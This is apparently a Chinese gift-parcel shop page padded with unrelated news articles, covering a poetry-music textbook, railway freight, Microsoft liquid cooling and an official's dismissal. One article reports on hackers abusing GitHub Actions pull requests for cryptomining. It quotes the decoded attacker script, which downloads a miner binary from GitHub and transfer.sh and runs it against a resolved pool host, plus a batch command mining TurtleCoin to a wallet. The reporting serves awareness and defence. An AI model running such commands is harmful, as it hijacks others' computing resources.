新品上新

查看更多>

.

皮尺带卡片

重量:0.005kg库存9709

¥0.4立即购买

气球打气筒

气球打气筒

重量:0.03kg库存4161

¥0.7立即购买

小风扇

重量:0.05kg库存26106

¥1.7立即购买

得力笔袋

重量:0.05kg库存9576

¥14立即购买

热销单品

查看更多>

小皮尺1卷

重量:0.01kg库存85111

¥0.4立即购买

塑料梳子1只

重量:0.005kg库存192799

¥0.4立即购买

电商洗衣粉

重量:0.249kg库存39700

¥0.65立即购买

梳子一把

重量:0.005kg库存48486

¥0.2立即购买

香包随机发

重量:0.011kg库存7426

¥0.2立即购买

剥橙器

重量:0.01kg库存13339

¥0.2立即购买

照片木夹1个

重量:0.01kg库存22518

¥0.2立即购买

洗发露1包

重量:0.011kg库存45266

¥0.2立即购买

快递礼品单-《用音乐学古诗》助力中小学传统文化教育

联系电话:18457923343,QQ:274982735,

  北京4月11日电 孔子曾有言:“诗可以兴,可以观,可以群,可以怨。”古典诗词作为中华民族优秀传统文化结晶,始终闪烁着光芒。

  中译出版社日前推出《用音乐学古诗》一套共两本,包括1-6年级分册、7-9年级分册。内容涵盖了义务教育小学及初中语文教科书必背的190余首古诗词,其中小学版涵盖108首、初中版涵盖85首。小学版自2020年1月上市以来,得到了教育界的老师及家长们的认可,反响热烈。《用音乐学古诗》将古诗词与现代音乐相结合,赋予中国经典诗词沁人心脾的优美传承方式,向世人呈现中国文化的意识、审美和情怀。

  该书作曲及监制刘尊,是中国关心下一代工作委员会—全国关爱各族少年儿童主题教育爱心大使,中国知名词曲作家、资深音乐制作人,首部《唐诗300首歌曲》作曲人。此外,书中还配有翻译大家许渊冲的优美译文,著名画家仇立权的插图,以及林玮博士撰写的诗词赏析,诗里诗外画龙点睛。

  中译出版社有限公司执行董事(社长)、党委书记、总编辑乔卫兵表示,五千年中华文化源远流长,正是因为我们的世代传承。用音乐学古诗,便是将中华传统文化通过现代音乐的方式永久地流传下去。中译出版社秉承繁荣文化、传承文明的出版宗旨,该书的出版,不仅是一种新的文化创新与尝试,也是用新的文化发展形式将中华文化魅力展现出来,让中国特色的传统文化重新焕发光彩,其独特性不言而喻。(完)

礼品代发-黑客用GitHub服务器挖矿:三天跑了3万个任务 代码惊现中文

联系电话:18457923343,QQ:274982735,

加密货币价格一路高涨,显卡又买不起,怎么才能“廉价”挖矿?黑客们动起了歪心思——“白嫖”服务器。给PC植入挖矿木马,已经无法满足黑客日益增长的算力需求,如果能用上GitHub的服务器,还不花钱,那当然是极好的。

而且整个过程可能比侵入PC还容易,甚至都不需要程序员上当受骗。只需提交Pull Request(PR),即使项目管理者没有批准,恶意挖矿代码依然能够执行。

原理也很简单,利用GitHub Action的自动执行工作流功能,轻松将挖矿程序运行在GitHub的服务器上。

早在去年11月,就已经有人发现黑客这种行为。更可怕的是,半年过去了,这种现象依然没得到有效制止。

GitHub心里苦啊,虽然可以封禁违规账号,但黑客们玩起了“游击战术”,不断更换马甲号逃避“追捕”,让官方疲于奔命。

就在几天前,一位荷兰的程序员还发现,这种攻击方式依然存在,甚至代码里还出现了中文。

那么,这些黑客是如何植入挖矿程序的呢?一切要从发现异常的法国程序员Tib说起。

PR异常让程序员起疑心

去年11月,Tib发现,自己在一个没有参加的repo上收到了PR请求。而且在14个小时内就收到了7个,全是来自一个“y4ndexhater1”的用户,没有任何描述内容。

令人感到奇怪的是,这并不是一个热门项目,Star数量为0。

打开项目主页发现,内容是Perl项目的github action、circle ci、travis-ci示例代码集合,整个README文档一团糟,根本不像一个正经的开源项目。

然而就是这个混乱又冷门的repo,居然在3天里被fork了2次。

一切都太不正常了,让人嗅到了一丝不安的气息。

尝试“作死”运行

本着“作死”的精神,Tib决定一探究竟。

经过那位可疑用户的操作,Tib所有的action都被删除,在工作流里被加入了一个ci.yml文件,内容如下:

当Tib看到eval “$(echo “YXB0IHVwZGF0ZSAt这一行内容后,立刻从沙发上跳了起来,他意识到事情的严重性:有人在入侵他的GitHub个人资料!

这串看似神秘的字符,其实是base64编码,经过翻译后,得到了另一段代码:

apt update -qq

apt install -y curl git jq

curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog

ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')

chmod u+x prog

timeout 4h ./prog -o '${ip}:3000' -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null

前面两行不必解释,有意思的地方从第三行开始,它会下载一个prog二进制文件。

为了安全起见,Tib先尝试获取信息而不是执行,得到了它的十六进制代码。

$ objdump -s --section .comment prog

prog: file format elf64-x86-64

Contents of section .comment:

0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.

0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1

0020 20323032 30313230 3300 20201203.

Tib也考虑过反编译,但是没有成功。

不入虎穴,焉得虎子,Tib决定尝试运行一下。

要执行这一大胆而又作死的任务,防止“试试就逝世”,Tib首先断开了电脑的网络链接,并选择在Docker容器中运行。

答案终于揭晓,原来这个prog是一个名为XMRig的挖矿程序。

$ ./prog --version

XMRig 6.8.1

built on Feb 3 2021 with GCC 10.2.1

features: 64-bit AES

libuv/1.40.0

OpenSSL/1.1.1i

hwloc/2.4.0

当时XMRig的最新版恰好是6.8.1,和上面的版本参数符合。不过用SHA256检测后发现,这个prog并不完全是XMRig,Tib预测它可能是一个修改版。

实际上,可能被攻击的不止GitHub,安全公司Aqua推测,像Docker Hub、Travis CI、Circle CI这些SaaS软件开发环境,都可能遭受这类攻击。

在这个攻击过程中,会派生一个合法的repo,负责将恶意的GitHub Action添加到原始代码。然后,黑客再向原始repo提交一个PR,将代码合并回原始repo。

下载的挖矿程序会伪装成prog或者gcc编译器,通过提交PR在项目执行自动化工作流。此时服务器将运行伪装后的挖矿程序。

这些攻击者仅一次攻击就可以运行多达100个挖矿程序,从而给GitHub的服务器带来了巨大的计算量。

据Aqua估计,仅在三天的时间里,挖矿黑客就在GitHub上有超过2.33万次commit、在Docker Hub上5.8万次build,转化了大约3万个挖矿任务。

可以防范但很难根除

这种攻击甚至不需要被攻击的仓库管理者接受恶意Pull Request。

只要在.github/workflows目录里面的任意.yml文件中配置了在收到Pull Request时执行,来自黑客的Action就会自动被执行

如果你没有使用这个功能,那就不用担心啦,黑客大概也不会找上你。

需要用到这个功能的话,可以设置成只允许本地Action或只允许Github官方及特定作者创建的Action。

将情况反馈给客服后,GitHub会对恶意账号进行封号和关闭相关Pull Request的操作。

但恶意攻击很难被根除,黑客只需要注册新的账号就可以继续白嫖服务器资源。

攻击还在继续

我们从最近一次攻击中发现,黑客将挖矿程序上传到GitLab并伪装成包管理工具npm。

打开这个可疑的nani.bat,可以看到:

npm.exe --algorithm argon2id_chukwa2

--pool turtlecoin.herominers.com:10380

--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP

--password xo

这一次黑客挖的是乌龟币*(TurtleCoin)*,可使用CPU计算。按当前价格挖出四千多个币才值1美元。

Github Actions的免费服务器可以提供E5 2673v4的两个核心,7GB内存。

大致估算单台运行一天只能获利几美分,而且黑客的挖矿程序通常只能在被发现之前运行几个小时。比如Docker Hub就把自动build的运行时间限制在2个小时。

不过蚊子再小也是肉,黑客通过寻找更多接受公开Action的仓库以及反复打开关闭Pull Request就能执行更多的挖矿程序。

同一黑客账号至少攻击了95个GitHub仓库

正如Twitter用户Dave Walker所说的,如果你提供免费的计算资源,就要做好会被攻击和滥用的觉悟。挖矿有利可图的情况下这是不可避免的。

据报道,受害的不止GitHub,还有Docker Hub、Travis CI以及Circle CI等提供类似服务的持续集成平台。

这一乱象不知何时才能结束,唯一的好消息可能就是,挖矿的黑客似乎只是针对GitHub提供的服务器资源,而不会破坏你的代码。

但是GitHub Action的漏洞不止这一个。还有方法能使黑客读写开发者的仓库,甚至可以读取加密的机密文件。

去年7月,Google Project Zero团队就已向GitHub通报漏洞。但在给出的90天修复期限+延长14天后,GitHub仍未能有效解决。

对此,我们的建议是,不要轻易相信GitHub市场里的Action作者,不要交出你的密匙。

相关文章:

代发礼品包-一季度国家铁路发送货物9.2亿吨 同比增加9880万吨增长12%

联系电话:18457923343,QQ:274982735,

  一季度国家铁路发送货物9.2亿吨

  记者从中国国家铁路集团有限公司(以下简称国铁集团)获悉,今年一季度,国家铁路发送货物9.2亿吨,同比增加9880万吨、增长12%。铁路货运量持续强劲增长,有效保障了国计民生重点物资运输,维护了国内国际供应链稳定畅通,为国民经济平稳运行和人民群众生产生活需要提供了可靠支撑,也为“碳达峰、碳中和”作出积极贡献。

  据国铁集团货运部负责人介绍,铁路部门加强货运组织,提升运输效率和服务品质,积极承接“公转铁”货源,较好地满足了货运市场需求。扩充货物运输能力,用好高铁成网释放的货运能力,优化运输组织,增开货物列车,国家铁路日均装车16.89万车,同比增加21054万车、增长14.2%。保障重点物资运输,针对极寒天气,实施电煤保供行动,加大万吨列车开行力度,浩吉、大秦、唐包、瓦日铁路运量同比分别增长175%、30%、78%、63%,国家铁路煤炭、电煤日均装车8.2万车和5.5万车,均创历史新高,铁路直供电厂煤炭可耗天数稳定在12天以上。加强国际联运组织,充分发挥中欧班列战略通道作用,持续实施口岸扩能增效工程,与国外铁路部门密切合作,确保国际供应链稳定畅通,中欧班列开行3345列、发送31.7万标箱,同比分别增长70%、79%。提升服务效率品质,主动对接企业客户,与1600家企业签订年度互保运量26.56亿吨。(记者刘静)

原标题:一季度国家铁路发送货物9.2亿吨

礼品代发-微软开始将服务器浸泡在液体中 以提高其性能和能源效率

联系电话:18457923343,QQ:274982735,

微软开始将其服务器浸泡在液体中,以提高其性能和能源效率。现在,一个服务器机架正在用于生产负载,看起来像一个液体浴池。这种浸泡过程在业内已经存在了几年,但微软声称它是第一家在生产环境中运行两相浸泡冷却的云供应商。

访问:

冷却的工作原理是将服务器机架完全浸没在一种特殊设计的非导电液体中。以氟碳为基础的液体的工作原理是,当它直接接触组件时,消除热量,液体达到较低的沸点(122华氏度或50摄氏度),以凝结并作为液体落回浴池中。这就形成了一个闭环冷却系统,降低了成本,因为不需要能量在槽内移动液体,冷凝器也不需要冷却器。

它本质上是一个浴盆,机架会躺在那个浴盆里面,你会看到的是液体沸腾,就像你看到锅里的沸腾一样。水的沸腾点是100摄氏度,而在这种情况下,它是在50摄氏度。近年来,这种液体冷却方式已经被加密矿工用来开采比特币和其他加密货币。微软在过去几年中试用这种方法,用它来测试应对云需求的高峰和机器学习等应用的密集工作负载。

现在大多数数据中心都是空气冷却,使用外部空气,并通过使用蒸发将其降至35摄氏度以下的温度进行冷却。这被称为沼泽冷却,但它在这个过程中使用了大量的水。这种新的液体浴技术旨在减少水的使用。它有可能会消除数据中心对水消耗的需求。这种服务器散热还可以让微软将硬件更紧密地包装在一起,与传统的风冷相比,长期来看应该可以减少所需空间。微软最初是在一个小型的内部生产工作负载中进行试验,并计划在未来更广泛地使用它。

微软将主要研究这种新冷却的可靠性影响,以及它甚至可以帮助云和AI需求的哪些类型的突发工作负载。这项工作的一部分也与微软解决水资源短缺的环境承诺有关。该公司承诺,到2030年,补充的水量甚至要超过其全球运营所使用的水量。这包括微软在办公室使用现场雨水收集系统,并收集的冷凝水到水厂。尽管如此,微软在2019年从市政系统和其他当地来源提取了近800万立方米的水,而2018年只有700多万立方米。

考虑到微软用水量增加的趋势,其解决用水问题的努力将极具挑战性,但如果更广泛地推广,像两相浸泡这样的项目肯定会有所帮助。

代发礼品包-瑞丽市委书记龚云尊被撤销党内职务、政务撤职

联系电话:18457923343,QQ:274982735,

  日前,经云南省委批准,云南省纪委省监委对德宏州委常委、瑞丽市委书记龚云尊同志,在疫情防控工作中严重失职失责问题进行了立案审查调查。

  经查,德宏州瑞丽市在半年多时间内,连续3次发生新冠肺炎疫情事件,特别是“3·29”疫情事件,严重冲击和破坏了全国、全省疫情防控大局,严重冲击和影响了全省经济社会发展和工作大局,造成严重后果和恶劣影响。龚云尊同志作为时任瑞丽市委书记,负有主要领导责任。经省委研究同意,给予龚云尊同志撤销党内职务、政务撤职处分,降为一级调研员。

  云南省纪委省监委要求,全省各级党组织和党员领导干部要引以为戒,汲取深刻教训,增强“四个意识”,坚定“四个自信”,做到“两个维护”,不折不扣贯彻落实好习近平总书记关于疫情防控重要指示批示精神和党中央重大决策部署,坚决纠治疫情防控工作中的形式主义、官僚主义问题,坚决整治疫情防控工作中不担当、不负责等失职失责行为,抓紧抓实抓细“外防输入、内防反弹”各项措施,坚决打赢疫情防控人民战争、总体战、阻击战,筑牢祖国西南安全屏障。

原标题:瑞丽市委书记龚云尊同志因在疫情防控工作中严重失职失责问题被撤销党内职务、政务撤职